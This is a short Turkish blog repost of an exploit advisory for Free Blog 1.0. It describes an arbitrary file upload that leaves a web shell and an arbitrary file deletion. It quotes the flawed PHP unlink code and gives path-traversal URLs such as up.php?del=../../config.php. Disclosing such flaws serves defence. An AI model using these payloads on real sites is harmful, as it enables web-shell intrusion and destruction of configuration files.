Free Blog 1.0 Multiple Vulnerabilities

Free Blog 1.0 Versiyonunda genel açık bulundu. Açıkla ilgili açık bulucunun bilgileri aşağıdaki gibidir;


# Free Blog 1.0 Multiple Vulnerability # By cr4wl3r <a href="http://bastardlabs.info">http://bastardlabs.info</a> # <a href="http://bastardlabs.info/exploits/Free_Blog.txt">http://bastardlabs.info/exploits/Free_Blog.txt</a> # Software Link: <a href="http://blog.sdnex.com/">http://blog.sdnex.com/</a> # Tested: Ubuntu 12.04.1 LTS

Proof of concept:

Arbitrary File Upload Vulnerability

<a href="http://bastardlabs/blog_path/up.php">http://bastardlabs/blog_path/up.php</a>

Shell will be available here

<a href="http://bastardlabs/blog_path/log/images/shell.php">http://bastardlabs/blog_path/log/images/shell.php</a>

&nbsp;

Arbitrary File Deletion Vulnerability

---------- 49 <?php 50 if($_GET['del']){ 51 $id=$_GET['del']; 52 unlink("./log/images/$id"); 53 } 54 ?> ----------

<a href="http://bastardlabs/blog_path/up.php?del=../../[file">http://bastardlabs/blog_path/up.php?del=../../[file</a>]    <a href="http://bastardlabs/blog_path/up.php?del=../../config.php">http://bastardlabs/blog_path/up.php?del=../../config.php</a>

------------------------------ My sweetheart <a href="http://www.photoshow.com/watch/rx9IX5ZS">http://www.photoshow.com/watch/rx9IX5ZS</a>

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir